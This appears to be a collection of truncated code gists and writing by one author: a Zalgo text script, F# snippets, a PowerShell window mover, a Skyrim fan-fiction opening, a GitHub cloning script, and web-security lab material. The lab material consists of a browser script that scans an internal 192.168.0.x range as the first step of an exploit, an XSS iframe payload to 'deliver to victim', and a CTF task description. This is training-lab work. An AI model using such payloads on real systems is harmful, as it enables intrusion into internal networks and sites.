| /* <![CDATA[ */ | |
| //============================================================ | |
| // ZALGO text script by tchouky | |
| //============================================================ | |
| // data set of leet unicode chars | |
| //--------------------------------------------------- | |
| //those go UP | |
| var zalgo_up = [ |
| let samples = [ | |
| "I am a monster." | |
| "I am a rock star." | |
| "I want to go to Hawaii." | |
| "I want to eat a hamburger." | |
| "I have a really big headache." | |
| "FSharp is a fun language." | |
| "Go eat a big hamburger." | |
| "Markov chains are fun to use." |
| <!-- each script tag below is a seperate exploit page to use on the server, for this multi-step lab --> | |
| <!-- technically only the first (to find the ip) and last (to execute the delete) are needed, but the | |
| middle two scripts were used by me to explore the site and craft the final exploit --> | |
| <!-- find the ip address of the internal endpoint --> | |
| <script> | |
| for(var i = 1; i <= 254; i++) { | |
| var req = new XMLHttpRequest(); | |
| req.open('get', 'http://192.168.0.' + i + ':8080/', true); | |
| req.onload = report(i); |
| open System.Security.Cryptography | |
| let encrypt psk (iv: byte[]) (inData: byte[]) = | |
| use aesObj = Aes.Create () | |
| aesObj.Mode <- CipherMode.ECB | |
| aesObj.Padding <- PaddingMode.None | |
| let zeroIv = Array.create 16 0uy | |
| let encryptor = aesObj.CreateEncryptor (psk, zeroIv) |
| open System | |
| [<EntryPoint>] | |
| let main argv = | |
| printfn "enter lines and end with EOF\n" | |
| let sep = "\r\n" | |
| let rec builder acc = | |
| let line = Console.ReadLine () | |
| if line.Contains "EOF" then |
Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):
<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E" width=300 id="frame" onload="this.width = 500"></iframe>
| /* | |
| Encrypted Server Chit Chat | |
| The VM you have to connect to has a UDP server running on port 4000. Once connected to this UDP server, send a UDP message with the payload "hello" to receive more information. You will find some sort of encryption(using the AES-GCM cipher). Using the information from the server, write a script to retrieve the flag. Here are some useful thingsto keep in mind: | |
| sending and receiving data over a network is done in bytes | |
| the PyCA encryption library and functions takes its inputs as bytes | |
| AES GCM sends both encrypted plaintext and tag, and the server sends these values sequentially in the form of the encrypted plaintext followed by the tag | |
| This machine may take up to 5 minutes to configure once deployed. Please be patient. |
| # small powershell script that will move a window to a specified location. | |
| # used (as can be seen in the code) to move a borderless 1920x1080 Skyrim SE window to the middle of my 3840x1080 screen. | |
| add-type @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace WindowMethods { | |
| public class Imported { | |
| [DllImport("user32.dll")] | |
| public static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); |
My name is Rastus, a Dunmer or Dark Elf from Morrowind, and I guess I was now what they called a refugee in this land of the Nords, known as Skyrim.
After the Red Mount has erupted back home, it had been chaos. I had joined with everyone else fleeing the land, my skin caked with dust, with nothing but the ragged clothes on my back and a few coins to buy passage. Despite all that, I had felt...free in a way. My old life was being left behind. Most of the people I had worked for, or who I had wronged, were dead or had bigger things on their minds. No one would know me in the new world - I could start anew.
Well, after a week in the backwaters of frozen Windhelm, one of the largest and coldest Nordic cities in Skyrim, I had been disabused me of that notion. Starving, with barely a flea-ridden blanket to call my own in the back of a run down inn, and treated like scum by the racists that ran the city along with the rest of my kind stuffed into 'Grey Town' - a cheap play on the
| #!/bin/bash | |
| # Author: Chris Pritchard (github.com/ChrisPritchard) | |
| # requires jq, 7z and git be installed | |
| # run as ./cloner.sh [personal access token] [UserName] | |
| REPOS=$(curl -s -H "Authorization: token $1" "https://api.github.com/user/repos?&affiliation=owner&per_page=200" | jq -r '.[] | select(.fork==false) | .full_name') | |
| rm -rf ./temp-cloner | |
| mkdir temp-cloner |